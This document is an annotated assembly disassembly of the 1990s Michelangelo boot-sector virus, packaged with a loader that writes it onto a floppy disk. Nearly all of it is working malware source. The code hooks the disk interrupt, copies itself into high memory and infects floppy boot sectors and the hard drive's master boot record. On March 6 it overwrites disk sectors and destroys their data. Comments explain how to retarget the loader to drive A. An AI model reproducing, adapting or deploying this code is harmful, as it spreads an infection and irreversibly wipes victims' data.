;virus                                               date 12/31/93
;disassembly of 1 version of the MICHElANGLO VIRUS
;michelangelo with a loader that will put the virus
;on a disk in drive b: will work correctly on 360 or 1.2meg disks
;loads orginal boot at last sector on those type of disks
;warning if computer date is march 6 on boot up with virus it will
;try to infect hard drive then write system info on 
;to disks destroying the information on disk 
;
;
;to load virus onto A drive alter the equ disk_dr to 00

int13_IP       EQU     0004CH                  ;interrupt 13H location
int13_CS       EQU     0004EH


MICHA           SEGMENT BYTE
		ASSUME CS:MICHA, DS:MICHA, ES:MICHA, SS:MICHA

;*****************************************************************************
;loader program        
	disk_dr         equ     01            ;01 disk b 00 disk a
	
	ORG     100H

START:          MOV     DL,DISK_DR
		XOR     SI,SI

		XOR     AX,AX                       ; RESET DRIVE
		INT     13H
		INC     SI
AGAIN:
		MOV     AX,201H                     ;READ BOOT INTO BUFFER
		MOV     BX,OFFSET BUFF
		MOV     CX,01
		MOV     Dh,00
		mov     dl,disk_dr
		INT     13H
		JNC     ALRIGHT

		CMP     SI,4
		JA      ERROR_WRITE

		xor     ax,ax
		int     13h
		JMP     AGAIN
ALRIGHT:                
		MOV     AX,301H                    ; WRITE BOOT TO 
		MOV     Dh,01                      ; LAST SECTOR OF 
		MOV     CL,03                      ; DIR
		mov     dl,disk_dr                 ; WHICH DISK
		CMP     BYTE PTR [BX+15H],0FDH     ; TYPE OF DISK HIGH LOW
		JZ      LOW_DENSW                  ;
		
		MOV     CL,0EH

LOW_DENSW:               
		MOV     [LOC_ORG_BOOT],CX       ; SETUP VIRUS FOR TYPE
		INT     13H                     ; DISK DRIVE              

		XOR     AX,AX                   ; RESET DRIVE
		INT     13H
		
		MOV     AX,0301H                ;WRITE VIRUS
		MOV     BX,OFFSET M_START       ; TO BOOT SECTOR
		mov     cx,01
		mov     Dh,00
		mov     dl,disk_dr
		INT     13H
		JNC     FINI
		
ERROR_WRITE:    MOV     AH,9
		MOV     DX,OFFSET ERROR_MESS
		INT     21H


FINI:
		INT     20H                     ;EXIT

ERROR_MESS      DB      'SORRY THERE IS A PROBLEM CHECK DRIVE DOOR'
		DB      'OR TRY ANOTHER DISK',24H

BUFF            DB      200H    DUP (90)        ;BUFFER FOR R/W OF DISK

;*************************************************************************

		ORG     0413H
MEM_SIZE        DW      ?                       ;memory size in kilobytes

		ORG     043FH
MOTOR_STATUS    DB      ?                       ;floppy disk motor status


;*************************************************************************                 

		 ORG     7C00H
M_START:
		JMP     START1

JMP_HI_MEM      DW      OFFSET HI_MEM - 7C00H
HIGH_SEG        DW      0

DESTROY_CNT     DB      02

LOC_ORG_BOOT    DW      000EH                            ;HIGH DENS

OLD_INT13_IP    DW      0
OLD_INT13_CS    DW      0

VIR_INT13:
		PUSH    DS                              ; SAVE REGS
		PUSH    AX                              ;
		OR      DL,DL                           ;  IS IT DISK DRIVE A
		JNZ     BIOS_INT13                      ;  NO 

		XOR     AX,AX                           ;CHECK MOTOR STATUS
		MOV     DS,AX                           ; IS MOTOR RUNNING
		TEST    BYTE PTR DS:[MOTOR_STATUS],01   ;
		JNZ     BIOS_INT13                      ; YES 

		POP     AX                                    ; LET
		POP     DS                                    ; THE INT CALL
		PUSHF                                         ; GO BUT RETURN
		CALL    DWORD PTR CS:[OLD_INT13_IP - 7C00H]   ; TO THE VIRUS

		PUSHF                                         ; ON RETURN
		CALL    INFECT_FLOPPY                         ; ATTEMPT INFECT

		POPF                            ;ATTEMPTED INFECT RETURN
		RETF    2                       ;TO ORGINAL INT CALLER

BIOS_INT13:
		POP     AX                                   ;LET BIOS HANDLE
		POP     DS                                   ;THE CALL
		JMP     DWORD PTR CS:[OLD_INT13_IP - 7C00H]  ;

INFECT_FLOPPY:
		PUSH    AX BX CX DX DS ES SI DI
				 
		PUSH    CS
		POP     DS
		
		PUSH    CS
		POP     ES

		MOV     SI,04                   ;RETRY COUNTER

READ_LP:
		MOV     AX,201H                 ; SETUP TO READ BOOT SECTOR
		MOV     BX,0200H                ; TO END OF VIRUS
		MOV     CX,01                   ;
		XOR     DX,DX                   ;
		
		PUSHF                                     ;FAKE A INT 13 CALL
		CALL    DWORD PTR [OLD_INT13_IP - 7C00H]  ;
		JNB     NO_ERROR                          ;

TRY_AGAIN:                                                ; IF ERROR
		XOR     AX,AX                             ; RESET DRIVE
		PUSHF                                     ; AND TRY AGAIN FOR 
		CALL    DWORD PTR [OLD_INT13_IP - 7C00H]  ; COUNT OF 4   
		DEC     SI                                ; USING SI 
		JNZ     READ_LP                           ;
							  
		JMP     SHORT ERROR_EXIT            ;PROBALY WRITE PROTECT
						    ;GET OUT
NO_ERROR:
		XOR     SI,SI

CHK_FOR_INFECTION:
		CLD                              ; CHECK FIRST 2 BYTES
		LODSW                            ; TO VIRUS
		CMP     AX,[BX]                  ;
		JNZ     NOT_INFECTED_A           ; NOT MATCH GO INFECT
		LODSW                            ; TRY NEXT 2 BYTES
		CMP     AX,[BX+2]                ;
		JZ      ERROR_EXIT               ; MATCH LEAVE

NOT_INFECTED_A:                                         
		MOV     AX,301H                         ; WRITE THE ORGINAL
		MOV     DH,01                           ; BOOT TO THE NEW 
		MOV     CL,03                           ; LOCATION FIND
		CMP     BYTE PTR [BX+15H],0FDH          ; NEW LOCATION
		JZ      LOW_DENS                        ; BY CHECKING IF 360
									
		MOV     CL,0EH                          ; OR 1.2

LOW_DENS:               
		MOV     [LOC_ORG_BOOT - 7C00H],CX       ;SAVE NEW LOCATION

		PUSHF                                    ;  CALL TO 
		CALL    DWORD PTR [OLD_INT13_IP - 7C00H] ;  INT 13
		JB      ERROR_EXIT

UPDATE_END:                                              
		MOV     SI,3BEH                          ; COPY LAST
		MOV     DI,1BEH                          ; 21 BYTES FROM 
		MOV     CX,21H                           ; ORGINAL BOOT
		CLD                                      ; SECTOR
		REPZ    MOVSW                            ; TO VIRUS
							 
		MOV     AX,0301H                        ; WRITE VIRUS
		XOR     BX,BX                           ; TO BOOT SECTOR
		MOV     CX,01                           ; SECTOR 1
		XOR     DX,DX                           ; DRIVE A HEAD A

		PUSHF                                    ;INT 13
		CALL    DWORD PTR [OLD_INT13_IP - 7C00H] ;

ERROR_EXIT:
		POP     DI SI ES DS DX CX BX AX          ; RESTORE REGS
		RET                                      ; LEAVE

START1:
		XOR     AX,AX                           ;WHERE WE JUMP TO
		MOV     DS,AX                           ;AT BOOT UP TIME
		CLI                                     ;SET UP STACK
		MOV     SS,AX                           ;
		MOV     AX,7C00H                        ;
		MOV     SP,AX                           ;
		STI                                     ;

		PUSH    DS                              ; SET UP FOR RETF 
		PUSH    AX                              ; LATER

		MOV     AX,DS:[INT13_IP]                ;SAVE OLD INT 13 
		mov     [OLD_INT13_IP],AX               ;VECTORS

		MOV     AX,DS:[INT13_CS]                ;
		MOV     [OLD_INT13_CS],AX               ;

		MOV     AX,DS:[MEM_SIZE]                ;DEC MEMORY SIZE
		DEC     AX                              ;
		DEC     AX                              ;
		MOV     DS:[MEM_SIZE],AX                ;

		MOV     CL,06H                          ;CONVERT SIZE TO 
		SHL     AX,CL                           ;SEGMENT ADDRESS
		MOV     ES,AX                           ;
							
		MOV     [HIGH_SEG],AX                   ;SAVE ADDRESS

		MOV     AX, OFFSET VIR_INT13 - 7C00H    ; SET UP INT 13 TO 
		MOV     DS:[INT13_IP],AX                ; POINT TO US
		MOV     DS:[INT13_CS],ES                ;

		MOV     CX,1BEH             ;OFFSET END_VIR - OFFSET M_START
		MOV     SI,7C00H            ;COPY VIRAL CODE UP IN MEMORY
		XOR     DI,DI               ;
		CLD                         ;
		REPZ    MOVSB               ;

		JMP     DWORD PTR CS:[JMP_HI_MEM]       ;GO THERE

HI_MEM:
		XOR     AX,AX               ; RESET DRIVE
		MOV     ES,AX               ; SET UP ES SEGMENT TO 0
		INT     13H                 ;

		PUSH    CS                  ;DS POINTS HERE
		POP     DS                  ;

		MOV     AX,0201H                        ;READ ORGINAL BOOT
		MOV     BX,7C00H                        ;
		MOV     CX,[LOC_ORG_BOOT - 7C00H]       ;
		CMP     CX,0007H                        ;
		JNZ     FLOPPY

H_DRIVE:                                                
		MOV     DX,0080H                        ; READ ORGINAL
		INT     13H                             ; BOOT FROM HARD DRIVE
		JMP     SHORT GET_DATE                  ; CHECK DATE

FLOPPY:
		MOV     CX,[LOC_ORG_BOOT - 7C00H]       ;READ ORGINAL
		MOV     DX,100H                         ;BOOT FROM FLOPPY
		INT     13H                             ;
		JB      GET_DATE                        ; IF ERROR CHECK DATE

		PUSH    CS
		POP     ES

HD_INFECT:
		MOV     AX,0201H                        ;READ 1 SECTOR
		mov     bx,0200h                        ;TO BUFFER
		mov     cx,0001h                        ;SECTOR 1 
		MOV     DX,0080H                        ;HEAD 0 DISK C:
		INT     13H

		JB      GET_DATE                        ;IF ERROR

CHK_BOOT:
		XOR     SI,SI
		CLD
		LODSW
		CMP     AX,[BX]
		JNE     NOT_INFECTED
		LODSW
		CMP     AX,[BX+2]
		JNE     NOT_INFECTED

GET_DATE:
		XOR     CX,CX                           ;GET DATE
		MOV     AH,04                           ;
		INT     1AH                             ;
		CMP     DX,0306H                        ;IS IT MARCH 6
		JZ      TRASH_DISK                      ;
		RETF                                    ;BIOS_BOOT

;******************************************************************
; TRASH DISK ROUTTINE SIMPLY WRITE MEMORY DATA FROM
; 5000:5000  TO THE DISKS FIRST 9 SECTORS UNTIL AN ERROR HITS IT
;

TRASH_DISK:
		XOR     DX,DX
		MOV     CX,1
D_LOOP:         
		MOV     AX,0309H                        ;WRITE DISK 9 SECTORS
		MOV     SI,[LOC_ORG_BOOT - 7C00H]
		CMP     SI,+03
		JE      FLPPY_DISK

		MOV     AL,0EH
		CMP     SI,+0EH
		JE      FLPPY_DISK

		MOV     DL,80H
		MOV     BYTE PTR [DESTROY_CNT - 7C00H],04
		MOV     AL,11H
FLPPY_DISK:
		MOV     BX,5000H
		MOV     ES,BX
		INT     13H
		
		JNB     NO_ERROR_DESTROY

;RESET_DISK
		XOR     AH,AH
		INT     13H

NO_ERROR_DESTROY:
		INC     DH
		CMP     DH,[DESTROY_CNT - 7C00H]
		JB      D_LOOP

		XOR     DH,DH
		INC     CH
		JMP     SHORT D_LOOP

;*********************************************************************

NOT_INFECTED:
;HD                                                    ; INFECT HD
		MOV     CX,0007                        ; BY WRITING       
		MOV     [LOC_ORG_BOOT - 7C00H],CX      ; ORGINAL BOOT
		MOV     AX,0301H                       ; TO HEAD 0 SECTOR 7
		MOV     DX,0080H                       ; TRACK 0 
		INT     13H                            ;
		JB      GET_DATE                       ;

;UPDATE_PARTION:
		MOV     SI,03BEH                       ;IMPORTANT TO UPDATE
		MOV     DI,01BEH                       ;PARTION TABLE
		MOV     CX,21H                         ;
		REPZ    MOVSW                          ;

		MOV     AX,0301H                       ;NOW WRITE VIRUS 
		XOR     BX,BX                          ;TO HARD DRIVE
		INC     CL                             ;
		INT     13H
		JMP     SHORT GET_DATE
;THE REST IS WHERE THE PARTION TABLE INFO GOES OR END OF FLOPPY DISK        
;BOOT SECTOR GOES

	ORG     7DBEH
END_VIR:
	
	DB      00
	ORG     7DFEH
BOOT_ID         DB 55H,0AAH

micha   ENDS
	END     START